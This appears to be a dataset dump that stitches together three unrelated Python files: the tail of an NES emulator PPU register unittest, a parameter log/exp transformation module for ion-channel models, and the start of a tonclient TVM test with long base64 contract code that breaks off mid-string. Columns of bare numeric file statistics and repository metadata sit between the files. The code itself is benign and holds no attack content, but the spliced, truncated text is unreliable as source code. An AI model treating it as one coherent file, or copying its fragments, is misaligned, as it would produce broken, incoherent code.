    Python 3.12 — replaced everywhere with ``assertEqual``.
    """

    def setUp(self):
        # Fresh PPU per test so register state cannot leak between tests.
        self.ppu = PPU()

    def tearDown(self):
        self.ppu = None

    def test_ppu_toogle_nmi(self):
        # nmi_enable drives bit 7 of ctrl.
        self.assertEqual(0b00000000, self.ppu.ctrl)
        self.ppu.nmi_enable = True
        self.assertEqual(0b10000000, self.ppu.ctrl)
        self.assertEqual(True, self.ppu.nmi_enable)
        self.ppu.nmi_enable = False
        self.assertEqual(0b00000000, self.ppu.ctrl)
        self.assertEqual(False, self.ppu.nmi_enable)

    def test_ppu_toogle_sprite_table(self):
        # sprite_pattern_table drives bit 3 of ctrl.
        self.assertEqual(0b00000000, self.ppu.ctrl)
        self.ppu.sprite_pattern_table = 1
        self.assertEqual(0b00001000, self.ppu.ctrl)
        self.ppu.sprite_pattern_table = 0
        self.assertEqual(0b00000000, self.ppu.ctrl)

    def test_ppu_toogle_background_table(self):
        # background_pattern_table drives bit 4 of ctrl.
        self.assertEqual(0b00000000, self.ppu.ctrl)
        self.ppu.background_pattern_table = 1
        self.assertEqual(0b00010000, self.ppu.ctrl)
        self.ppu.background_pattern_table = 0
        self.assertEqual(0b00000000, self.ppu.ctrl)

    def test_ppu_toogle_sprite(self):
        # sprite_enable drives bit 4 of mask.
        self.assertEqual(0b00000000, self.ppu.mask)
        self.ppu.sprite_enable = True
        self.assertEqual(0b00010000, self.ppu.mask)
        self.assertEqual(True, self.ppu.sprite_enable)
        self.ppu.sprite_enable = False
        self.assertEqual(0b00000000, self.ppu.mask)
        self.assertEqual(False, self.ppu.sprite_enable)

    def test_ppu_toogle_background(self):
        # background_enable drives bit 3 of mask.
        self.assertEqual(0b00000000, self.ppu.mask)
        self.ppu.background_enable = True
        self.assertEqual(0b00001000, self.ppu.mask)
        self.assertEqual(True, self.ppu.background_enable)
        self.ppu.background_enable = False
        self.assertEqual(0b00000000, self.ppu.mask)
        self.assertEqual(False, self.ppu.background_enable)

    def test_ppu_toogle_background2(self):
        # ctrl and mask are independent: setting one must not disturb
        # the other.
        self.assertEqual(0b00000000, self.ppu.ctrl)
        self.assertEqual(0b00000000, self.ppu.mask)
        self.ppu.nmi_enable = True
        self.ppu.sprite_enable = True
        self.assertEqual(0b10000000, self.ppu.ctrl)
        self.assertEqual(True, self.ppu.nmi_enable)
        self.assertEqual(0b00010000, self.ppu.mask)
        self.assertEqual(True, self.ppu.sprite_enable)
| 37.046875
| 60
| 0.694644
| 295
| 2,371
| 5.433898
| 0.115254
| 0.179039
| 0.194635
| 0.224579
| 0.854648
| 0.73612
| 0.726138
| 0.701185
| 0.533999
| 0.444167
| 0
| 0.093617
| 0.207086
| 2,371
| 63
| 61
| 37.634921
| 0.759043
| 0
| 0
| 0.461538
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.519231
| 1
| 0.153846
| false
| 0
| 0.038462
| 0
| 0.211538
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
740c0e19256f8cd55d090dbbde99684273871f1e
| 13,544
|
py
|
Python
|
Parameter_inference_real_data/python/transformation.py
|
CardiacModelling/model-reduction-manifold-boundaries
|
88ccb24d0ec9d0742a4a93e820fec7fee1a65b61
|
[
"BSD-3-Clause"
] | null | null | null |
Parameter_inference_real_data/python/transformation.py
|
CardiacModelling/model-reduction-manifold-boundaries
|
88ccb24d0ec9d0742a4a93e820fec7fee1a65b61
|
[
"BSD-3-Clause"
] | null | null | null |
Parameter_inference_real_data/python/transformation.py
|
CardiacModelling/model-reduction-manifold-boundaries
|
88ccb24d0ec9d0742a4a93e820fec7fee1a65b61
|
[
"BSD-3-Clause"
] | null | null | null |
#!/usr/bin/env python3
#
# Parameter transformations
#
from __future__ import division, print_function
import numpy as np
class Transformation(object):
    """
    Transforms parameters from model to search space (and back).

    For every supported model a fixed subset of the parameters (the
    rate-like ones) is log-transformed into search space; the remaining
    parameters — including the conductance, always the last entry — are
    passed through unchanged. ``detransform`` applies ``exp`` at exactly
    the same positions, so ``detransform(transform(p, m), m)`` recovers
    ``p``.
    """

    # Per-model (parameter count, indices that are log-transformed).
    # These tables encode exactly the same mapping as the original
    # ~360 lines of duplicated per-model branches.
    _MODELS = {
        'mazhari':         (17, frozenset({0, 2, 4, 6, 8, 10, 12, 14, 15})),
        'mazhari-reduced': (11, frozenset({0, 2, 4, 5, 7, 8})),
        'wang':            (15, frozenset({0, 2, 4, 5, 6, 8, 10, 12})),
        'wang-r1':         (14, frozenset({0, 2, 4, 5, 6, 8, 10, 12})),
        'wang-r2':         (13, frozenset({0, 2, 4, 5, 6, 8, 10})),
        'wang-r3':         (12, frozenset({0, 2, 4, 5, 6, 8})),
        'wang-r4':         (11, frozenset({0, 1, 3, 4, 5, 7})),
        'wang-r5':         (10, frozenset({0, 2, 3, 4, 6})),
        'wang-r6':         (9,  frozenset({1, 2, 3, 5})),
        'wang-r7':         (8,  frozenset({1, 2, 3, 5})),
        'wang-r8':         (7,  frozenset({1, 2, 3})),
    }

    def _apply(self, values, which_model, func):
        """Apply ``func`` at the model's log-indices; copy the rest.

        Raises ``ValueError`` for an unknown model name.  (The original
        code fell through ``else: pass`` and crashed with an
        ``UnboundLocalError`` on ``return x`` instead.)
        """
        try:
            n, log_idx = self._MODELS[which_model]
        except KeyError:
            raise ValueError('Unknown model: {!r}'.format(which_model))
        return np.array([func(values[i]) if i in log_idx else values[i]
                         for i in range(n)])

    def transform(self, parameters, which_model, noise=False):
        """
        Transform from model into search space (log on rate parameters).

        ``noise`` is accepted for interface compatibility and unused,
        as in the original implementation.
        """
        return self._apply(parameters, which_model, np.log)

    def detransform(self, transformed_parameters, which_model, noise=False):
        """
        Transform back from search space to model space (exp on the same
        indices that ``transform`` log-transformed).
        """
        return self._apply(transformed_parameters, which_model, np.exp)
| 36.213904
| 76
| 0.464117
| 1,159
| 13,544
| 5.288179
| 0.062985
| 0.438571
| 0.161527
| 0.27998
| 0.885626
| 0.885626
| 0.851036
| 0.848752
| 0.839452
| 0.83162
| 0
| 0.040877
| 0.427422
| 13,544
| 373
| 77
| 36.310992
| 0.749452
| 0.033225
| 0
| 0.906344
| 0
| 0
| 0.01261
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.006042
| false
| 0.006042
| 0.006042
| 0
| 0.021148
| 0.003021
| 0
| 0
| 0
| null | 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
741173391445414f94453d508de8e0ef6dabf6e9
| 57,723
|
py
|
Python
|
tonclient/test/test_tvm.py
|
move-ton/ton-client-py
|
a9393a0e03b5da9bf5369a44c6873a3e720af229
|
[
"Apache-2.0"
] | 28
|
2020-10-29T06:57:32.000Z
|
2022-03-20T12:26:14.000Z
|
tonclient/test/test_tvm.py
|
move-ton/ton-client-py
|
a9393a0e03b5da9bf5369a44c6873a3e720af229
|
[
"Apache-2.0"
] | 1
|
2021-03-30T18:18:17.000Z
|
2021-04-04T15:35:10.000Z
|
tonclient/test/test_tvm.py
|
move-ton/ton-client-py
|
a9393a0e03b5da9bf5369a44c6873a3e720af229
|
[
"Apache-2.0"
] | 8
|
2020-10-28T20:11:52.000Z
|
2022-01-12T12:28:02.000Z
|
import base64
import json
import os
import unittest
from tonclient.errors import TonException
from tonclient.test.helpers import send_grams, SAMPLES_DIR, async_core_client,\
sync_core_client
from tonclient.types import Abi, DeploySet, CallSet, Signer, StateInitSource, \
AccountForExecutor, ParamsOfEncodeMessage, ParamsOfProcessMessage, \
ParamsOfWaitForCollection, ParamsOfParse, ParamsOfRunExecutor, \
ParamsOfRunTvm, ParamsOfEncodeAccount, ParamsOfRunGet, BocCacheType
class TestTonTvmAsyncCore(unittest.TestCase):
def test_execute_message(self):
    """End-to-end check of `tvm.run_executor` and `tvm.run_tvm`.

    Deploys the `Subscription` sample contract, then verifies that:
      * running the executor with an unlimited-balance account snapshot
        does not drain the on-chain balance;
      * a standard (limited-balance) executor run produces a transaction
        referencing the sent message and charges non-zero fees;
      * `run_tvm` on the updated account state returns the subscription
        data that was previously stored.
    Requires a reachable node (network I/O via `async_core_client`).
    """
    # Load the sample contract artifacts.
    contract_abi = Abi.from_path(
        os.path.join(SAMPLES_DIR, 'Subscription.abi.json'))
    with open(os.path.join(SAMPLES_DIR, 'Subscription.tvc'), 'rb') as tvc_fp:
        tvc_b64 = base64.b64encode(tvc_fp.read()).decode()

    keys = async_core_client.crypto.generate_random_sign_keys()
    wallet = '0:2222222222222222222222222222222222222222222222222222222222222222'

    # Build the deploy message for the contract.
    signer = Signer.Keys(keys=keys)
    encode_params = ParamsOfEncodeMessage(
        abi=contract_abi,
        signer=signer,
        deploy_set=DeploySet(tvc=tvc_b64),
        call_set=CallSet(
            function_name='constructor', input={'wallet': wallet}))
    deploy_message = async_core_client.abi.encode_message(
        params=encode_params)

    # Fund the future address, then deploy.
    send_grams(address=deploy_message.address)
    async_core_client.processing.process_message(
        params=ParamsOfProcessMessage(
            message_encode_params=encode_params, send_events=False))

    # Fetch the deployed account state (id + boc).
    account = async_core_client.net.wait_for_collection(
        params=ParamsOfWaitForCollection(
            collection='accounts', result='id boc',
            filter={'id': {'eq': deploy_message.address}}))

    # Record the balance before any executor runs.
    parsed = async_core_client.boc.parse_account(
        params=ParamsOfParse(boc=account.result['boc']))
    orig_balance = parsed.parsed['balance']

    # Encode a `subscribe` call message.
    subscribe_params = {
        'subscriptionId': '0x1111111111111111111111111111111111111111111111111111111111111111',
        'pubkey': '0x2222222222222222222222222222222222222222222222222222222222222222',
        'to': '0:3333333333333333333333333333333333333333333333333333333333333333',
        'value': '0x123',
        'period': '0x456'
    }
    encoded_message = async_core_client.abi.encode_message(
        params=ParamsOfEncodeMessage(
            abi=contract_abi, signer=signer,
            address=deploy_message.address,
            call_set=CallSet(
                function_name='subscribe', input=subscribe_params)))

    # Executor with unlimited balance: must not reduce the real balance.
    result = async_core_client.tvm.run_executor(
        params=ParamsOfRunExecutor(
            message=encoded_message.message,
            account=AccountForExecutor.Account(
                boc=account.result['boc'], unlimited_balance=True),
            abi=contract_abi, return_updated_account=True))
    parsed = async_core_client.boc.parse_account(
        params=ParamsOfParse(boc=result.account))
    self.assertLess(
        int(orig_balance, 16), int(parsed.parsed['balance'], 16))

    # Executor in standard mode: real fees are charged.
    result = async_core_client.tvm.run_executor(
        params=ParamsOfRunExecutor(
            message=encoded_message.message,
            account=AccountForExecutor.Account(
                boc=account.result['boc'], unlimited_balance=False),
            abi=contract_abi, return_updated_account=True))
    self.assertEqual(
        encoded_message.message_id, result.transaction['in_msg'])
    self.assertGreater(result.fees.total_account_fees, 0)

    # Read the stored subscription back via run_tvm.
    encoded_message = async_core_client.abi.encode_message(
        params=ParamsOfEncodeMessage(
            abi=contract_abi, signer=signer,
            address=deploy_message.address,
            call_set=CallSet(
                function_name='getSubscription',
                input={
                    'subscriptionId': subscribe_params['subscriptionId']
                })))
    result = async_core_client.tvm.run_tvm(
        params=ParamsOfRunTvm(
            message=encoded_message.message,
            account=result.account, abi=contract_abi))
    self.assertEqual(
        subscribe_params['pubkey'],
        result.decoded.output['value0']['pubkey'])
def test_run_get(self):
elector_address = '-1:3333333333333333333333333333333333333333333333333333333333333333'
elector_code = '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'
elector_data = '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
